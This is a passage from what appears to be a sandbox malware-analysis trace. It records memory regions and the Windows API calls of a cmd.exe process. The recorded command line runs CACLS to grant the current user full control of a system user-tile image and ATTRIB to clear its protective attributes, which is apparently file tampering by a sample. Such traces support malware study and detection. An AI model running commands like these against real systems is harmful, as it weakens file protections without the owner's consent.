"c:\\windows\\system32\\ntdll.dll") Region: id = 25049 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25050 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25051 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 25052 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25053 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25054 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25055 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25056 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 25057 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 25058 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25059 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25060 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25061 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25062 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25063 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25064 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25065 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25066 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25067 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 25068 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25069 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25070 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25071 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 25072 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25073 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25074 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 25075 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 25076 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 25077 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 453 os_tid = 0xa24 [0179.950] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f944 | out: lpSystemTimeAsFileTime=0x26f944*(dwLowDateTime=0xa09da660, dwHighDateTime=0x1d440a9)) [0179.950] GetCurrentProcessId () returned 0x47c [0179.950] GetCurrentThreadId () returned 0xa24 [0179.950] GetTickCount () returned 0x33dda [0179.950] QueryPerformanceCounter (in: lpPerformanceCount=0x26f93c | out: lpPerformanceCount=0x26f93c*=23673966014) returned 1 [0179.951] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0179.951] __set_app_type (_Type=0x1) [0179.951] __p__fmode () returned 0x76b331f4 [0179.951] __p__commode () returned 0x76b331fc [0179.951] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0179.951] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0179.951] GetCurrentThreadId () returned 0xa24 [0179.951] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa24) returned 0x38 [0179.952] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0179.952] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0179.952] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.952] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0179.952] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f8d4 | out: phkResult=0x26f8d4*=0x0) returned 0x2 [0179.952] VirtualQuery (in: lpAddress=0x26f90b, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0179.952] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0179.952] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0179.952] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0179.952] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f8a4, dwLength=0x1c | out: lpBuffer=0x26f8a4*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0179.952] GetConsoleOutputCP () returned 0x1b5 [0179.952] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0179.952] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0179.952] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.952] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0179.952] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.952] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0179.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.953] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0179.953] _get_osfhandle (_FileHandle=0) returned 0x3 [0179.953] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0179.953] _get_osfhandle (_FileHandle=0) returned 0x3 [0179.953] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0179.953] GetEnvironmentStringsW () returned 0x360308* [0179.953] FreeEnvironmentStringsW (penv=0x360308) returned 1 [0179.954] GetEnvironmentStringsW () returned 0x360308* [0179.954] FreeEnvironmentStringsW (penv=0x360308) returned 1 [0179.954] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e844 | out: phkResult=0x26e844*=0x40) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0xb8, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x1, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0x1, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x0, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x40, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x40, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0x40, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.954] RegCloseKey (hKey=0x40) returned 0x0 [0179.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e844 | out: phkResult=0x26e844*=0x40) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0x40, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x1, lpcbData=0x26e848*=0x4) returned 0x0 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0x1, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.954] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x0, lpcbData=0x26e848*=0x4) returned 0x0 [0179.955] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x9, lpcbData=0x26e848*=0x4) returned 0x0 [0179.955] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x4, lpData=0x26e850*=0x9, lpcbData=0x26e848*=0x4) returned 0x0 [0179.955] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e84c, lpData=0x26e850, lpcbData=0x26e848*=0x1000 | out: lpType=0x26e84c*=0x0, lpData=0x26e850*=0x9, lpcbData=0x26e848*=0x1000) returned 0x2 [0179.955] RegCloseKey (hKey=0x40) returned 0x0 [0179.955] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638e [0179.955] srand (_Seed=0x5b88638e) [0179.955] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"" [0179.955] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"" [0179.955] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0179.955] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0179.955] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0179.955] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0179.955] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.955] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0179.955] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0179.956] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0179.956] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0179.956] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0179.956] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0179.956] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0179.956] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0179.956] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0179.956] GetEnvironmentStringsW () returned 0x362458* [0179.956] FreeEnvironmentStringsW (penv=0x362458) returned 1 [0179.956] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.956] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.956] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0179.956] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0179.956] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0179.956] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0179.956] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0179.956] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0179.956] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0179.956] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0179.956] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f610 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0179.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f610, lpFilePart=0x26f60c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f60c*="Desktop") returned 0x18 [0179.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0179.956] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f38c | out: lpFindFileData=0x26f38c) returned 0x360ae8 [0179.957] FindClose (in: hFindFile=0x360ae8 | out: hFindFile=0x360ae8) returned 1 [0179.957] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f38c | out: lpFindFileData=0x26f38c) returned 0x360ae8 [0179.957] FindClose (in: hFindFile=0x360ae8 | out: hFindFile=0x360ae8) returned 1 [0179.957] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f38c | out: lpFindFileData=0x26f38c) returned 0x360ae8 [0179.957] FindClose (in: hFindFile=0x360ae8 | out: hFindFile=0x360ae8) returned 1 [0179.957] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0179.957] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0179.957] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0179.957] GetEnvironmentStringsW () returned 0x360308* [0179.957] FreeEnvironmentStringsW (penv=0x360308) returned 1 [0179.957] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0179.958] GetConsoleOutputCP () returned 0x1b5 [0179.958] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0179.958] GetUserDefaultLCID () returned 0x409 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f750, cchData=128 | out: lpLCData="0") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f750, cchData=128 | out: lpLCData="0") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f750, cchData=128 | out: lpLCData="1") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0179.959] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0179.960] GetConsoleTitleW (in: lpConsoleTitle=0x3509b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.960] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0179.960] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0179.961] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0179.961] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0179.962] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0179.962] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0179.962] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0179.962] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0179.962] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0179.962] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0179.962] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0179.962] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0179.965] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0179.965] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0179.965] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0179.965] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0179.965] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0179.965] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0179.965] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0179.967] GetConsoleTitleW (in: lpConsoleTitle=0x26f3e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.967] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0179.967] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0179.967] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0179.968] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0179.968] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0179.968] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0179.968] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0179.968] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0179.968] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0179.968] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0179.968] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0179.968] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0179.968] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0179.968] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0179.968] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0179.968] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0179.968] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0179.968] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0179.968] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0179.968] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0179.968] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0179.968] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0179.968] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0179.968] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0179.968] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0179.968] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0179.968] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0179.968] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0179.968] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0179.968] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0179.968] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0179.968] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0179.968] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0179.968] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0179.969] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0179.969] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0179.969] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0179.969] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0179.969] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0179.969] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0179.969] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0179.969] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0179.969] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0179.969] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0179.969] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0179.969] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0179.969] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0179.969] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0179.969] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0179.969] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0179.969] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0179.969] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0179.969] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0179.969] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0179.969] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0179.969] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0179.969] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0179.969] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0179.969] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0179.969] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0179.969] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0179.969] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0179.969] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0179.969] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0179.969] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 